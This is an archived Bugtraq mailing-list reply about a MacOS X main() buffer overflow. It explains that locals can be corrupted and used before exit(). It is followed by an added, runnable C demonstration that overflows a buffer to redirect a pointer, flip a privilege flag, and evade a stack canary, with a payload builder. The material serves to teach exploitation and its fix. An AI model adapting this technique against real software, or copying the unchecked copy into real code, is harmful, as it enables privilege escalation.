Bugtraq mailing list archives
Re: Buffer overflow/privilege escalation in MacOS X
From: Mariusz Woloszyn <emsi () ipartners pl>
Date: Tue, 16 Dec 2003 19:15:13 +0100 (CET)
On Mon, 15 Dec 2003, Dave G. wrote:
> Indeed. However, due to several mitigating factors, this issue does not appear to be exploitable (at least not with any of the techniques I am aware of). The overflow occurs in main() and there is an unavoidable exit() at the end of the function. So while you can overwrite the return stack frame, the process will never use your new value.
But you overflow local variables, argc and argv**, so if the program ever uses them after the overflow, it might be possible to exploit it, _before_ exit(). See: http://www.phrack.org/show.php?p=56&a=5, at the end of the "Oily way" part. We explained there how to exploit code protected by a compiler that places a canary word before the RET. Of course a couple of conditions must be fulfilled.

Regards,

--
Mariusz Wołoszyn
Internet Security Specialist, GTS - Internet Partners
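The pattern Mariusz is pointing at, as an added illustration that is not from the thread and not the MacOS X program under discussion: main() overflows a buffer, keeps using another local after the copy, and ends in exit(). The frame is modelled as a struct so the layout is deterministic rather than compiler-dependent; the names (vulnerable_main, build_payload, g_privileged, g_status) and the copy through a byte view of the frame are assumptions of this demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed model of main()'s frame: the overflowable buffer sits directly
 * below a local pointer that main() still dereferences after the copy.
 * A struct is used so the layout does not depend on the compiler. */
struct frame {
    char buf[16];
    int *status;            /* main() writes through this before exit() */
};

int g_status = 0;           /* legitimate destination of *status */
int g_privileged = 0;       /* stand-in for a uid/"authorised" flag */

/* The bug as described in the thread: unchecked copy of attacker input into
 * a buffer in main(), a use of another local, then an unconditional exit().
 * The copy goes through a byte view of the whole frame so the spill into
 * f.status is well defined for the demo (it stands in for a plain strcpy). */
int vulnerable_main(const char *input, size_t len, int do_exit)
{
    struct frame f;
    f.status = &g_status;

    if (len > sizeof f)      /* demo guard only: the missing check is against sizeof f.buf */
        return -1;
    memcpy(&f, input, len);  /* BUG: len is never compared with sizeof f.buf */

    /* The overflowed local is used BEFORE exit(): after the copy, f.status
     * points wherever the input said, so this is a write-what-where. */
    *f.status = 1;

    if (do_exit)
        exit(0);             /* return address never used, as Dave G. notes */
    return 0;
}

/* Attacker side: filler up to the pointer, then the address to plant. */
size_t build_payload(char *out, size_t cap, int *where)
{
    size_t fill = offsetof(struct frame, status);
    size_t total = fill + sizeof where;
    if (cap < total)
        return 0;
    memset(out, 'A', fill);
    memcpy(out + fill, &where, sizeof where);  /* native byte order */
    return total;
}

/* Normal input: fits in buf, status lands in g_status. Returns g_status. */
int run_benign(void)
{
    g_status = 0;
    g_privileged = 0;
    vulnerable_main("hello", 6, 0);
    return g_status;                /* 1 */
}

/* Crafted input: f.status redirected to g_privileged. Returns g_privileged. */
int run_exploit(void)
{
    char payload[64];
    size_t n = build_payload(payload, sizeof payload, &g_privileged);
    g_status = 0;
    g_privileged = 0;
    vulnerable_main(payload, n, 0); /* do_exit=0 so the demo can report */
    return g_privileged;            /* 1: flipped without ever touching RET */
}

int main(void)
{
    int s = run_benign();
    printf("benign:  g_status=%d g_privileged=%d\n", s, g_privileged);
    int p = run_exploit();
    printf("exploit: g_privileged=%d g_status=%d\n", p, g_status);
    return 0;
}
```

Build with a plain `cc demo.c` and run it. The flag flips in the exploit run even though the return address is never consumed, and a canary placed before RET would not notice either: the corrupted pointer is dereferenced before the function epilogue where the canary is checked. The fix in the real program is to bound the copy by the size of the buffer, not by the length of the input.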